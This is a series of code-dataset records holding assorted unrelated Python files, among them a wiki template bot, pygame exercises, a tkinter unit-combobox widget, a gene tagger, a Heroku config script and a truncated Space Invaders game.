'''aAàÀảẢãÃáÁạẠăĂằẰẳẲẵẴắẮặẶâÂầẦẩẨẫẪấẤậẬbBcCdDđĐeEèÈẻẺẽẼéÉẹẸêÊềỀểỂễỄếẾệỆfFgGhHiIìÌỉỈĩĨíÍịỊjJkKlLmMnNoOòÒỏỎõÕóÓọỌôÔồỒổỔỗỖốỐộỘơƠờỜởỞỡỠớỚợỢpPqQrRsStTuUùÙủỦũŨúÚụỤưƯừỪửỬữỮứỨựỰvVwWxXyYỳỲỷỶỹỸýÝỵỴzZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ '''\n # config['weights'] = 'checkpoint/ngaycap_0204.pth'\n print(config)\n trainer = Trainer(config, pretrained=True)\n trainer.config.save(f'train_config/{checkpoint_name}.yml')\n trainer.train()\n\n\n# main (file config, ten model,duong dan thu muc train)\nmain('vgg_seq2seq', 'seq2seq_handwriting_0207_pretrain_32_2k', '/home/longhn/handwriting_0207')\n# Address:\n# iter: 1000000 - valid loss: 0.721 - acc full seq: 0.8174 - acc per char: 0.9423\n\n\n","sub_path":"handwriting_draft_train.py","file_name":"handwriting_draft_train.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"253980786","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pywikibot, re, sys, argparse\n\nimport blib\nfrom blib import getparam, rmparam, msg, site, tname\n\nfrom form_of_templates import (\n language_specific_alt_form_of_templates,\n alt_form_of_templates,\n language_specific_form_of_templates,\n form_of_templates\n)\n\ntemplates_to_process = form_of_templates + alt_form_of_templates + (\n language_specific_form_of_templates + language_specific_alt_form_of_templates\n)\n\ndef process_page(page, index, parsed):\n pagetitle = str(page.title())\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n\n pagemsg(\"Processing\")\n notes = []\n\n for t in parsed.filter_templates():\n origt = str(t)\n tn = tname(t)\n if tn == \"#invoke:form of/templates\" and getparam(t, \"1\") == \"template_tags\":\n t.add(\"1\", \"tagged_form_of_t\")\n notes.append(\"Rewrite {{#invoke:form of/templates|template_tags}} with {{#invoke:form of/templates|tagged_form_of_t}}\")\n if tn == \"#invoke:form of\" and getparam(t, \"1\") in [\"form_of_t\", \"alt_form_of_t\"]:\n ignorelist = blib.fetch_param_chain(t, \"ignorelist\", \"ignorelist\")\n if ignorelist:\n ignore = blib.fetch_param_chain(t, \"ignore\", \"ignore\")\n for il in ignorelist:\n ignore.append(il + \":list\")\n blib.set_param_chain(t, ignore, \"ignore\", \"ignore\", before=\"ignorelist\")\n blib.remove_param_chain(t, \"ignorelist\", \"ignorelist\")\n blib.set_template_name(t, \"#invoke:form of/templates\")\n notes.append(\"Rewrite {{#invoke:form of|%s}} with {{#invoke:form of/templates|form_of_t}}\" % getparam(t, \"1\"))\n if tn == \"#invoke:form of\" and getparam(t, \"1\") == \"alt_form_of_t\":\n t.add(\"2\", getparam(t, \"text\"), before=\"text\")\n rmparam(t, \"text\")\n if t.has(\"nocap\"):\n rmparam(t, \"nocap\")\n else:\n t.add(\"withcap\", \"1\")\n if t.has(\"nodot\"):\n rmparam(t, \"nodot\")\n else:\n t.add(\"withdot\", \"1\")\n t.add(\"1\", \"form_of_t\")\n\n if str(t) != origt:\n pagemsg(\"Replaced <%s> with <%s>\" % (origt, str(t)))\n\n return str(parsed), notes\n\nparser = blib.create_argparser(\"Convert form_of_t and alt_form_of_t invocations in [[Module:form of]] to form_of_t in [[Module:form of/templates]]\")\nargs = parser.parse_args()\nstart, end = blib.parse_start_end(args.start, args.end)\n\nfor i, template in blib.iter_items(templates_to_process, start, end):\n page = pywikibot.Page(site, \"Template:%s\" % template)\n blib.do_edit(page, i, process_page, save=args.save, verbose=args.verbose)\n","sub_path":"rewrite_form_of_templates.py","file_name":"rewrite_form_of_templates.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"186824464","text":"# 03box.py\n# First drawing exercises in pygame, draws a box\n# 2014-04-30\tPV\n\nimport pygame\nimport random\n\ndef map(value, min_in, max_in, min_out, max_out):\n\treturn int(0.5+(value-min_in)/(max_in-min_in)*(max_out-min_out)+min_out)\n\ndef dot(x,y):\n\tglobal x0, y0, side\n\tglobal window, res, width, height\n\tx2 = map(x,0,255,x0,x0+side)\n\ty2 = map(y,0,255,y0,y0+side)\n\tpygame.draw.circle(window, pygame.Color(255,128,0), [x2, y2], 6, 0)\n\tpygame.display.update()\n\ndef setup():\n\tglobal window, res, width, height\n\tpygame.init()\n\tres = (1920, 1080)\n\twidth, height = res\n\twindow = pygame.display.set_mode(res, pygame.FULLSCREEN)\n\t#window.fill(pygame.Color(255,255,255))\n\n\tglobal x0, y0, side\n\tside = height-20\n\tx0 = int(width/2-side/2)\n\ty0 = 10\n\tpygame.draw.rect(window, pygame.Color(0,255,0), [x0,y0,side,side], 3)\n\tpygame.draw.line(window, pygame.Color(0,255,0), [x0+side/2,y0], [x0+side/2,y0+side], 1)\n\tpygame.draw.line(window, pygame.Color(0,255,0), [x0,y0+side/2], [x0+side,y0+side/2], 1)\n\ndef display():\n\tdot(0,0)\n\tdot(0,255)\n\tdot(255,0)\n\tdot(255,255)\n\tdot(64,64)\n\tdot(128,128)\n\tdot(192,192)\n\nif __name__=='__main__':\n\tsetup()\n\tdisplay()\n\trunning = True\n\twhile running:\n\t\t#loop()\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type==pygame.KEYDOWN:\n\t\t\t\trunning = False\n\t\t\t\tbreak\n\tpygame.quit()\n\n","sub_path":"pygame/03box.py","file_name":"03box.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"34097921","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Labeled combobox widget with units.\n\nThe goal of these widgets is twofold: to make it easier for developers\nto implement dialogs with compound widgets, and to naturally\nstandardize the user interface presented to the user.\n\"\"\"\n\nimport logging\nfrom seamm_util import Q_, units_class, default_units\nimport seamm_widgets as sw\nimport tkinter as tk\nimport tkinter.ttk as ttk\n\nlogger = logging.getLogger(__name__)\n\noptions = {\n \"unitcombobox\": {\n \"as_quantity\": \"as_quantity\",\n },\n \"units\": {\n \"class_\": \"class_\",\n \"cursor\": \"cursor\",\n \"exportselection\": \"exportselection\",\n \"unitsheight\": \"height\",\n \"unitsjustify\": \"justify\",\n \"postcommand\": \"postcommand\",\n \"style\": \"style\",\n \"unitstakefocus\": \"takefocus\",\n \"variable\": \"textvariable\",\n \"unitsvalidate\": \"validate\",\n \"unitsvalidatecommand\": \"validatecommand\",\n \"unitswidth\": \"width\",\n \"unitsxscrollcommand\": \"xscrollcommand\",\n },\n}\n\n\nclass UnitCombobox(sw.LabeledCombobox):\n def __init__(self, parent, *args, **kwargs):\n \"\"\"Initialize the instance\"\"\"\n class_ = kwargs.pop(\"class_\", \"MUnitCombobox\")\n super().__init__(parent, class_=class_)\n\n interior = self.interior\n\n # unitcombobox options\n self.as_quantity = kwargs.pop(\"as_quantity\", False)\n\n # units combobox\n unitsheight = kwargs.pop(\"unitsheight\", 7)\n unitswidth = kwargs.pop(\"unitswidth\", 10)\n unitsstate = kwargs.pop(\"unitsstate\", \"readonly\")\n\n self.units = ttk.Combobox(\n interior, height=unitsheight, width=unitswidth, state=unitsstate\n )\n self.units.grid(row=0, column=0, sticky=tk.EW)\n\n # interior frame\n self.interior = ttk.Frame(interior)\n self.interior.grid(row=0, column=1, sticky=tk.NSEW)\n\n self.config(**kwargs)\n\n @property\n def value(self):\n return self.get()\n\n @value.setter\n def value(self, value):\n self.set(value)\n\n def show(self, *args):\n \"\"\"Show only the specified subwidgets.\n 'all' or no arguments reverts to showing all\"\"\"\n\n super().show(*args)\n\n show_all = len(args) == 0 or args[0] == \"all\"\n\n if show_all or \"units\" in args:\n self.units.grid(row=0, column=0, sticky=tk.W)\n else:\n self.units.grid_forget()\n\n def set(self, value, unit_string=None):\n \"\"\"Set the the value and units\"\"\"\n\n if value is None:\n return\n\n # the value may have units or be a plain value\n if isinstance(value, units_class):\n self.combobox.set(value.magnitude)\n\n dimensionality = value.dimensionality\n current_units = self.units.cget(\"values\")\n if len(current_units) > 0:\n for unit in current_units:\n if unit != \"\":\n if Q_(unit).dimensionality != dimensionality:\n self.units.configure(values=[])\n current_units = []\n break\n\n if len(current_units) == 0:\n self.set_units([*default_units(str(dimensionality)), \"\"])\n self.units.set(\"{0.units:~}\".format(value).replace(\" \", \"\"))\n elif unit_string is not None:\n self.combobox.set(value)\n\n dimensionality = Q_(unit_string).dimensionality\n current_units = self.units.cget(\"values\")\n if len(current_units) > 0:\n for unit in current_units:\n if unit != \"\":\n if Q_(unit).dimensionality != dimensionality:\n self.units.configure(values=[])\n current_units = []\n break\n\n if len(current_units) == 0:\n self.set_units([*default_units(str(dimensionality)), \"\"])\n self.units.set(unit_string)\n else:\n self.combobox.set(value)\n self.set_units(\"all\")\n self.units.set(\"\")\n\n def get(self):\n \"\"\"return the current value with units\"\"\"\n value = self.combobox.get()\n if value in self.combobox.cget(\"values\"):\n return value\n else:\n unit = self.units.get()\n if unit == \"\":\n return value\n elif self.as_quantity:\n try:\n magnitude = float(value)\n return Q_(magnitude, unit)\n except Exception:\n return (value, unit)\n else:\n return (value, unit)\n\n def set_units(self, values=None):\n if values is None:\n dimensionality = str(self.get().dimensionality)\n self.units.config(values=[*default_units(dimensionality), \"\"])\n elif values == \"all\":\n self.units.config(values=[*default_units(\"all\"), \"\"])\n else:\n self.units.config(values=values)\n\n def config(self, **kwargs):\n \"\"\"Set the configuration of the megawidget\"\"\"\n unitcombobox = options[\"unitcombobox\"]\n units = options[\"units\"]\n\n # cannot modify kwargs while iterating over it...\n keys = [*kwargs.keys()]\n for k in keys:\n if k in unitcombobox and unitcombobox[k] in self.__dict__:\n v = kwargs.pop(k)\n self.__dict__[unitcombobox[k]] = v\n elif k in units:\n v = kwargs.pop(k)\n self.units.config(**{units[k]: v})\n\n # having removed our options, pass rest to parent\n super().config(**kwargs)\n","sub_path":"seamm_widgets/unit_combobox.py","file_name":"unit_combobox.py","file_ext":"py","file_size_in_byte":5659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"421248894","text":"numners = [8, 1, 2, 2, 3]\ny = sorted(numners)\n\nres = []\nresult = {}\nfor index, num in enumerate(y):\n if num not in result:\n result[num] = index\nfor i in numners:\n res.append(result[i])\nprint(res)\n","sub_path":"Easy/smallerNumThanCurrNumber.py","file_name":"smallerNumThanCurrNumber.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"165862014","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def sortList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if not head or head.next==None:\n return head\n \n temp=head\n slow=head\n fast=head\n \n while fast!=None and fast.next!=None:\n temp=slow\n slow=slow.next\n fast=fast.next.next\n \n temp.next=None \n left=self.sortList(head)\n right=self.sortList(slow)\n #head=start of first list\n #temp= end of first list\n #slow=start of second list\n #fast= end of second list\n \n return self.merge(left, right)\n \n def merge(self,l1, l2):\n sortedTemp=ListNode(0)\n curr=sortedTemp #l1 =left siide list, l2=right side list\n \n while (l1!=None and l2!=None):\n if l1.val detect intent: preference')\r\n tokenized, info = self.tokenizer.parse_sentence(sentence)\r\n prin('> tokenized: ' + str(tokenized))\r\n prin('> info:', info)\r\n info['ratings']=info['rate']\r\n data = self.sa.parse_sentence(tokenized, info)\r\n self._process_genres(data)\r\n prin('> data:', data)\r\n return {'intent': 'recommendation', 'data': data}\r\n elif res == 1:\r\n # factoid\r\n prin('> detect intent: factoid')\r\n data = self.query.parse(tokenize(sentence))\r\n prin('> data:', data)\r\n return {'intent': 'factoid', 'data': data}\r\n else:\r\n # query\r\n prin('> detect intent: query')\r\n tokenized, info = self.tokenizer.parse_sentence(sentence)\r\n prin('> tokenized: ', tokenized)\r\n prin('> info:', info)\r\n info['ratings']=info['rate']\r\n data = {\r\n 'like': info,\r\n 'dislike': {'person': [], 'year': [], 'genre': [], 'ratings': [], 'time': [], 'movie': []}\r\n }\r\n self._process_genres(data)\r\n return {'intent': 'recommendation', 'data': data}\r\n\r\nif __name__ == '__main__':\r\n mod = nlu_subsystem()\r\n q = input('> Input: ')\r\n while q != 'q':\r\n mod.process_sentence(q, log=True)\r\n q = input('> Input: ')","sub_path":"nlu_pipeline.py","file_name":"nlu_pipeline.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"29614476","text":"# coding=utf-8\n\"\"\" This module contains the essential to purge system response. Also\n autodiscover and publish to the system any class that comply this requisites:\n\n+ Is a subclass of BasePurge\n+ Is in a module inside this package\n\nThe purges classes are published in a dictionary ordered by short name. The\ndictionary is called purges_by_name\n\"\"\"\n\nfrom pkgutil import iter_modules\nfrom .basepurge import BasePurge\n\npurges_by_name = dict()\n\nfor element, name, is_package in \\\n iter_modules(path=__path__, prefix=__name__+\".\"):\n module = element.find_module(name).load_module(name)\n for class_name in dir(module):\n purge_class = getattr(module, class_name)\n # duck typing\n if hasattr(purge_class, \"purge_mention\")\\\n and hasattr(purge_class, \"purge_entity\") \\\n and hasattr(purge_class, \"short_name\") \\\n and callable(purge_class.purge_mention)\\\n and callable(purge_class.purge_entity)\\\n and purge_class.short_name != \"base\":\n purges_by_name[purge_class.short_name] = purge_class\n\nall_purges = purges_by_name.keys()\n","sub_path":"corefgraph/multisieve/purges/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"280113521","text":"'''\nCreated on 17 Feb 2021\n\n@author: thomasgumbricht\n'''\n\n# Standard library imports\n\n# Third party imports\n\nimport numpy as np\n \n# Package application imports\n\nfrom geoimagine.ktnumba import InterpolateLinearNaNNumba\n\nclass TimeSeriesNumba:\n ''' translator between Time Series and Numba \n '''\n \n def __init__(self):\n '''Empty call to access the functions\n '''\n pass\n \n def _FillAlongAxis(self, ts, validfraction=0.5):\n '''Linear interpolation of NaN, calls Numba function\n '''\n \n if np.all(np.isnan(ts)):\n \n return self.dstNullDarr[self.activeComp]\n \n if np.isnan(np.sum(ts)):\n \n #non_nans = (~np.isnan(ts)).sum()\n non_nans = np.count_nonzero(~np.isnan(ts))\n \n nans = np.count_nonzero(np.isnan(ts))\n \n if float(non_nans)/ts.shape[0] < validfraction:\n \n return self.dstNullDarr[self.activeComp]\n \n avg = np.nanmean(ts)\n \n if np.isnan(ts[0]):\n \n ts[0] = avg\n \n if np.isnan(ts[ts.shape[0]-1]):\n \n ts[ts.shape[0]-1] = avg\n \n ts = InterpolateLinearNaNNumba(ts)\n \n return ts\n \n else:\n \n return ts","sub_path":"numbautil.py","file_name":"numbautil.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"449159206","text":"#!/usr/bin/env python3\nimport os\nimport sys\nfrom config.app_config import BaseConfig\n\n\ndef env_vars():\n env_file = BaseConfig.ENV_FILE\n declarations = \"\"\n\n if not os.path.exists(env_file):\n print(\"Hey, you need a .env file.\", file=sys.stderr)\n sys.exit(1)\n\n with open(env_file, 'r') as env:\n for line in env.readlines():\n declarations += line.rstrip() + ' '\n\n return declarations\n\n\ndef set_heroku_config(declarations):\n os.system(f\"heroku config:set {declarations}\")\n\n\ndef main():\n declarations = env_vars()\n set_heroku_config(declarations)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/setup_heroku.py","file_name":"setup_heroku.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"181609679","text":"#Ning\r\n#14 October 2019\r\n#Linguistics TP3\r\n\r\ndef simple_gene_tagger(counts_file, dev_file):\r\n\r\n emissions_gene = {}\r\n emissions_nogene = {}\r\n counts = {}\r\n\r\n with open(counts_file, \"r\") as fp:\r\n for line in fp:\r\n segment = line.split()\r\n\r\n if(segment[1]==\"WORDTAG\"): #doing WORDTAG section\r\n\r\n if(segment[2] == \"GENE\"):\r\n emissions_gene[segment[3]] = float(segment[0]) #hash the word and the tag counts\r\n\r\n elif(segment[2] == \"NOGENE\"):\r\n emissions_nogene[segment[3]] = float(segment[0])\r\n\r\n elif(segment[1]==\"1-GRAM\"): #doing 1-GRAM section\r\n counts[segment[2]] = float(segment[0])\r\n\r\n else: #we're not doing anything beyond 1-GRAM\r\n break\r\n\r\n #read dev file and tag\r\n tags = []\r\n with open(dev_file, \"r\") as devfp:\r\n\r\n for line in devfp:\r\n line = line.split(\"\\n\")\r\n line = line[0]\r\n if(len(line)>0): #not an empty line\r\n\r\n #do the emission probability here\r\n if(line in emissions_gene and line in emissions_nogene): #has both tags, find more likely\r\n gene_prob = emissions_gene[line]/counts[\"GENE\"]\r\n nogene_prob = emissions_nogene[line]/counts[\"NOGENE\"]\r\n\r\n choice = max(gene_prob, nogene_prob)\r\n\r\n if(choice == gene_prob):\r\n tags.append(line+\" \"+\"GENE\"+\"\\n\")\r\n elif(choice == nogene_prob):\r\n tags.append(line+\" \"+\"NOGENE\"+\"\\n\")\r\n\r\n elif(line in emissions_gene):\r\n gene_prob = emissions_gene[line]/counts[\"GENE\"]\r\n nogene_prob = 0/counts[\"NOGENE\"]\r\n\r\n choice = max(gene_prob, nogene_prob)\r\n\r\n if(choice == gene_prob):\r\n tags.append(line+\" \"+\"GENE\"+\"\\n\")\r\n elif(choice == nogene_prob):\r\n tags.append(line+\" \"+\"NOGENE\"+\"\\n\")\r\n\r\n elif(line in emissions_nogene):\r\n gene_prob = 0/counts[\"GENE\"]\r\n nogene_prob = emissions_nogene[line]/counts[\"NOGENE\"]\r\n\r\n choice = max(gene_prob, nogene_prob)\r\n\r\n if(choice == gene_prob):\r\n tags.append(line+\" \"+\"GENE\"+\"\\n\")\r\n elif(choice == nogene_prob):\r\n tags.append(line+\" \"+\"NOGENE\"+\"\\n\")\r\n\r\n else:#_RARE_ ALWAYS TAKES GENE\r\n gene_prob = emissions_gene[\"_RARE_\"]/counts[\"GENE\"]\r\n nogene_prob = emissions_nogene[\"_RARE_\"]/counts[\"NOGENE\"]\r\n\r\n choice = max(gene_prob, nogene_prob)\r\n\r\n if(choice == gene_prob):\r\n tags.append(line+\" \"+\"GENE\"+\"\\n\")\r\n elif(choice == nogene_prob):\r\n tags.append(line+\" \"+\"NOGENE\"+\"\\n\")\r\n\r\n else:\r\n tags.append(\"\\n\") #otherwise an empty line\r\n\r\n with open(\"gene.test.p1.out\", \"w\") as devp1out:\r\n devp1out.writelines(tags)\r\n\r\nif __name__ == \"__main__\":\r\n simple_gene_tagger(\"gene_rare.counts\", \"gene.test\")\r\n","sub_path":"linguistic_approaches/tp3/gene/simple_gene_tagger.py","file_name":"simple_gene_tagger.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"385357070","text":"# Space Invaders\n# Created by Lee Robinson\n\n#!/usr/bin/env python\nimport os\nimport math as mth\nfrom pygame import *\n#import pygame\nimport sys\nimport argparse\nimport numpy as np\nfrom random import shuffle, randrange, choice, randint\nfrom .. import base\n\n# R G B\nWHITE \t= (255, 255, 255)\nGREEN \t= (78, 255, 87)\nYELLOW \t= (241, 255, 0)\nBLUE \t= (80, 255, 239)\nPURPLE \t= (203, 0, 255)\nRED \t= (237, 28, 36)\n\nSCREEN \t\t= display.set_mode((800,600))\nFONT = \"ple/games/SpaceInvadersGame/fonts/space_invaders.ttf\"\nIMG_NAMES \t= [\"ship\", \"ship\", \"mystery\", \"enemy1_1\", \"enemy1_2\", \"enemy2_1\", \"enemy2_2\",\n\t\t\t\t\"enemy3_1\", \"enemy3_2\", \"explosionblue\", \"explosiongreen\", \"explosionpurple\", \"laser\", \"enemylaser\"]\nIMAGES \t\t= {name: image.load(\"ple/games/SpaceInvadersGame/images/{}.png\".format(name)).convert_alpha()\n\t\t\t\tfor name in IMG_NAMES}\n\nclass Ship(sprite.Sprite):\n\tdef __init__(self):\n\t\tsprite.Sprite.__init__(self)\n\t\tself.image = IMAGES[\"ship\"]\n\t\tself.rect = self.image.get_rect(topleft=(375, 540))\n\t\tself.speed = 5\n\n\tdef update(self, keys, *args):\n\t\tif keys[K_LEFT] and self.rect.x > 10:\n\t\t\tself.rect.x -= self.speed\n\t\tif keys[K_RIGHT] and self.rect.x < 740:\n\t\t\tself.rect.x += self.speed\n\t\tgame.screen.blit(self.image, self.rect)\n\tdef move_left(self):\n\t\tif self.rect.x > 10:\n\t\t\tself.rect.x -= self.speed\n\t\tgame.screen.blit(self.image, self.rect)\n\tdef move_right(self):\n\t\tif self.rect.x < 740:\n\t\t\tself.rect.x += self.speed\n\t\tgame.screen.blit(self.image, self.rect)\n\tdef no_move(self) :\n\t\tgame.screen.blit(self.image, self.rect)\n\n\nclass Bullet(sprite.Sprite):\n\tdef __init__(self, xpos, ypos, direction, speed, filename, side):\n\t\tsprite.Sprite.__init__(self)\n\t\tself.image = IMAGES[filename]\n\t\tself.rect = self.image.get_rect(topleft=(xpos, ypos))\n\t\tself.speed = speed\n\t\tself.direction = direction\n\t\tself.side = side\n\t\tself.filename = filename\n\n\tdef update(self, keys, *args):\n\t\tgame.screen.blit(self.image, self.rect)\n\t\tself.rect.y += self.speed * self.direction\n\t\tif self.rect.y < 15 or self.rect.y > 600:\n\t\t\tself.kill()\n\n\nclass Enemy(sprite.Sprite):\n\tdef __init__(self, row, column):\n\t\tsprite.Sprite.__init__(self)\n\t\tself.row = row\n\t\tself.column = column\n\t\tself.images = []\n\t\tself.load_images()\n\t\tself.index = 0\n\t\tself.image = self.images[self.index]\n\t\tself.rect = self.image.get_rect()\n\t\tself.direction = 1\n\t\tself.rightMoves = 15\n\t\tself.leftMoves = 30\n\t\tself.moveNumber = 0\n\t\tself.moveTime = 600\n\t\tself.firstTime = True\n\t\tself.movedY = False\n\t\tself.columns = [False] * 10\n\t\tself.aliveColumns = [True] * 10\n\t\tself.addRightMoves = False\n\t\tself.addLeftMoves = False\n\t\tself.numOfRightMoves = 0\n\t\tself.numOfLeftMoves = 0\n\t\tself.timer = time.get_ticks()\n\n\tdef update(self, keys, currentTime, killedRow, killedColumn, killedArray):\n\t\tself.check_column_deletion(killedRow, killedColumn, killedArray)\n\t\tif currentTime - self.timer > self.moveTime:\n\t\t\tself.movedY = False\n\t\t\tif self.moveNumber >= self.rightMoves and self.direction == 1:\n\t\t\t\tself.direction *= -1\n\t\t\t\tself.moveNumber = 0\n\t\t\t\tself.rect.y += 35\n\t\t\t\tself.movedY = True\n\t\t\t\tif self.addRightMoves:\n\t\t\t\t\tself.rightMoves += self.numOfRightMoves\n\t\t\t\tif self.firstTime:\n\t\t\t\t\tself.rightMoves = self.leftMoves\n\t\t\t\t\tself.firstTime = False\n\t\t\t\tself.addRightMovesAfterDrop = False\n\t\t\tif self.moveNumber >= self.leftMoves and self.direction == -1:\n\t\t\t\tself.direction *= -1\n\t\t\t\tself.moveNumber = 0\n\t\t\t\tself.rect.y += 35\n\t\t\t\tself.movedY = True\n\t\t\t\tif self.addLeftMoves:\n\t\t\t\t\tself.leftMoves += self.numOfLeftMoves\n\t\t\t\tself.addLeftMovesAfterDrop = False\n\t\t\tif self.moveNumber < self.rightMoves and self.direction == 1 and not self.movedY:\n\t\t\t\tself.rect.x += 10\n\t\t\t\tself.moveNumber += 1\n\t\t\tif self.moveNumber < self.leftMoves and self.direction == -1 and not self.movedY:\n\t\t\t\tself.rect.x -= 10\n\t\t\t\tself.moveNumber += 1\n\n\t\t\tself.index += 1\n\t\t\tif self.index >= len(self.images):\n\t\t\t\tself.index = 0\n\t\t\tself.image = self.images[self.index]\n\n\t\t\tself.timer += self.moveTime\n\t\tgame.screen.blit(self.image, self.rect)\n\t\tif self.rect.y > 600:\n\t\t\tself.kill()\n\n\tdef check_column_deletion(self, killedRow, killedColumn, killedArray):\n\t\tif killedRow != -1 and killedColumn != -1:\n\t\t\tkilledArray[killedRow][killedColumn] = 1\n\t\t\tfor column in range(10):\n\t\t\t\tif all([killedArray[row][column] == 1 for row in range(5)]):\n\t\t\t\t\tself.columns[column] = True\n\n\t\tfor i in range(5):\n\t\t\tif all([self.columns[x] for x in range(i + 1)]) and self.aliveColumns[i]:\n\t\t\t\tself.leftMoves += 5\n\t\t\t\tself.aliveColumns[i] = False\n\t\t\t\tif self.direction == -1:\n\t\t\t\t\tself.rightMoves += 5\n\t\t\t\telse:\n\t\t\t\t\tself.addRightMoves = True\n\t\t\t\t\tself.numOfRightMoves += 5\n\t\t\t\t\t\n\t\tfor i in range(5):\n\t\t\tif all([self.columns[x] for x in range(9, 8 - i, -1)]) and self.aliveColumns[9 - i]:\n\t\t\t\tself.aliveColumns[9 - i] = False\n\t\t\t\tself.rightMoves += 5\n\t\t\t\tif self.direction == 1:\n\t\t\t\t\tself.leftMoves += 5\n\t\t\t\telse:\n\t\t\t\t\tself.addLeftMoves = True\n\t\t\t\t\tself.numOfLeftMoves += 5\n\n\tdef load_images(self):\n\t\timages = {0: [\"1_2\", \"1_1\"],\n\t\t\t\t 1: [\"2_2\", \"2_1\"],\n\t\t\t\t 2: [\"2_2\", \"2_1\"],\n\t\t\t\t 3: [\"3_1\", \"3_2\"],\n\t\t\t\t 4: [\"3_1\", \"3_2\"],\n\t\t\t\t }\n\t\timg1, img2 = (IMAGES[\"enemy{}\".format(img_num)] for img_num in images[self.row])\n\t\tself.images.append(transform.scale(img1, (40, 35)))\n\t\tself.images.append(transform.scale(img2, (40, 35)))\n\n\nclass Blocker(sprite.Sprite):\n\tdef __init__(self, size, color, row, column):\n\t sprite.Sprite.__init__(self)\n\t self.height = size\n\t self.width = size\n\t self.color = color\n\t self.image = Surface((self.width, self.height))\n\t self.image.fill(self.color)\n\t self.rect = self.image.get_rect()\n\t self.row = row\n\t self.column = column\n\n\tdef update(self, keys, *args):\n\t\tgame.screen.blit(self.image, self.rect)\n\n\nclass Mystery(sprite.Sprite):\n\tdef __init__(self):\n\t\tsprite.Sprite.__init__(self)\n\t\tself.image = IMAGES[\"mystery\"]\n\t\tself.image = transform.scale(self.image, (75, 35))\n\t\tself.rect = self.image.get_rect(topleft=(-80, 45))\n\t\tself.row = 5\n\t\tself.moveTime = 25000\n\t\tself.direction = 1\n\t\tself.timer = time.get_ticks()\n\t\tself.mysteryEntered = mixer.Sound('ple/games/SpaceInvadersGame/sounds/mysteryentered.wav')\n\t\tself.mysteryEntered.set_volume(0.3)\n\t\tself.playSound = False\n\n\tdef update(self, keys, currentTime, *args):\n\t\tresetTimer = False\n\t\tif (currentTime - self.timer > self.moveTime) and (self.rect.x < 0 or self.rect.x > 800) and self.playSound:\n\t\t\tself.mysteryEntered.play()\n\t\t\tself.playSound = False\n\t\tif (currentTime - self.timer > self.moveTime) and self.rect.x < 840 and self.direction == 1:\n\t\t\tself.mysteryEntered.fadeout(4000)\n\t\t\tself.rect.x += 2\n\t\t\tgame.screen.blit(self.image, self.rect)\n\t\tif (currentTime - self.timer > self.moveTime) and self.rect.x > -100 and self.direction == -1:\n\t\t\tself.mysteryEntered.fadeout(4000)\n\t\t\tself.rect.x -= 2\n\t\t\tgame.screen.blit(self.image, self.rect)\n\t\tif (self.rect.x > 830):\n\t\t\tself.playSound = True\n\t\t\tself.direction = -1\n\t\t\tresetTimer = True\n\t\tif (self.rect.x < -90):\n\t\t\tself.playSound = True\n\t\t\tself.direction = 1\n\t\t\tresetTimer = True\n\t\tif (currentTime - self.timer > self.moveTime) and resetTimer:\n\t\t\tself.timer = currentTime\n\n\t\nclass Explosion(sprite.Sprite):\n\tdef __init__(self, xpos, ypos, row, ship, mystery, score):\n\t\tsprite.Sprite.__init__(self)\n\t\tself.isMystery = mystery\n\t\tself.isShip = ship\n\t\tif mystery:\n\t\t\tself.text = Text(FONT, 20, str(score), WHITE, xpos+20, ypos+6)\n\t\telif ship:\n\t\t\tself.image = IMAGES[\"ship\"]\n\t\t\tself.rect = self.image.get_rect(topleft=(xpos, ypos))\n\t\telse:\n\t\t\tself.row = row\n\t\t\tself.load_image()\n\t\t\tself.image = transform.scale(self.image, (40, 35))\n\t\t\tself.rect = self.image.get_rect(topleft=(xpos, ypos))\n\t\t\tgame.screen.blit(self.image, self.rect)\n\t\t\t\n\t\tself.timer = time.get_ticks()\n\t\t\n\tdef update(self, keys, currentTime):\n\t\tif self.isMystery:\n\t\t\tif currentTime - self.timer <= 200:\n\t\t\t\tself.text.draw(game.screen)\n\t\t\tif currentTime - self.timer > 400 and currentTime - self.timer <= 600:\n\t\t\t\tself.text.draw(game.screen)\n\t\t\tif currentTime - self.timer > 600:\n\t\t\t\tself.kill()\n\t\telif self.isShip:\n\t\t\tif currentTime - self.timer > 300 and currentTime - self.timer <= 600:\n\t\t\t\tgame.screen.blit(self.image, self.rect)\n\t\t\tif currentTime - self.timer > 900:\n\t\t\t\tself.kill()\n\t\telse:\n\t\t\tif currentTime - self.timer <= 100:\n\t\t\t\tgame.screen.blit(self.image, self.rect)\n\t\t\tif currentTime - self.timer > 100 and currentTime - self.timer <= 200:\n\t\t\t\tself.image = transform.scale(self.image, (50, 